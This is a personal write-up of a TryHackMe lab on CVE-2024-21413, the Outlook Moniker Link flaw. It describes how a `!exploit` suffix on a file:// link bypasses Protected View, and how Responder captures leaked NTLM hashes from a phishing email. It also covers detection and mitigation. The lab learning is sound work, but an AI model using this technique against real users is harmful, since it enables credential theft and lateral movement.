### 🛡️ Moniker Link (CVE-2024-21413)
**Room:** [Moniker Link (CVE-2024-21413) — TryHackMe](https://tryhackme.com/room/monikerlink)
**Status:** ✅ Completed
**Date:** *30 May 2025*
---
### 🎯 Objective
Understand and exploit CVE-2024-21413, a vulnerability in Microsoft Outlook that bypasses Protected View using Moniker Links to leak NTLM credentials. Learn how to perform the attack and detect or mitigate it.
---
### 🗝️ Key Concepts
- **Moniker Link** — A type of hyperlink that can reference system components and applications in Windows using the COM model.
- **Protected View** — Outlook's read-only mode that blocks external content to protect users.
- **NTLM Hash Leak** — Triggering an SMB authentication attempt from the victim leaks their netNTLMv2 hash to the attacker.
- **file:// Exploit** — Adding `!exploit` to a file:// URL bypasses Protected View and triggers SMB connection.
- **Responder** — A tool used to capture NTLM hashes by listening for SMB authentication requests.
- **RCE (Remote Code Execution)** — The vulnerability also has the potential for code execution, though no public PoC currently exists.
- **Detection** — YARA rules and Wireshark can help detect attempted or successful exploitation.
---
### 🛠️ Tools Used
- **Responder** — Captured the victim’s NTLM hash once the malicious link was clicked.
- **Python (smtplib)** — Used to send the malicious email with the Moniker Link to the victim.
- **Outlook (on vulnerable VM)** — Email client that parsed the Moniker Link and leaked credentials.
- **YARA** — Rule by Florian Roth to detect email indicators of compromise.
- **Wireshark** — Used to view the SMB authentication request and hash in transit.
---
### ⚠️ Challenges Faced
- Modifying the Moniker Link syntax correctly to bypass Protected View required close attention to detail.
- Adjusting the exploit script to match IP and mail server settings took a couple of attempts.
---
### 🧠 What I Learned
- Even trusted software like Outlook can be tricked into leaking credentials with low-complexity attacks.
- Small syntax changes (like `!exploit`) can completely bypass built-in protections.
- YARA rules are useful for catching suspicious behaviour in email content.
- Responder is a powerful tool for capturing authentication attempts — especially NTLM leaks over SMB.
---
### 🌐 Real-World Application:
> A phishing email using a Moniker Link can be enough to leak NTLM hashes from Outlook users. In corporate environments, this could lead to lateral movement, privilege escalation, or pass-the-hash attacks — even before any malware is deployed.
---
### 💭 Reflections:
- This CVE was both simple and powerful — just one click on a crafted link and credentials are leaked.
- The attack chain was straightforward but highlights the importance of patching and monitoring.
[4.0K] /data/pocs/81db4a9b7d7ae7ed07f954104d36da7656982ce3
└── [2.9K] README.md
0 directories, 1 file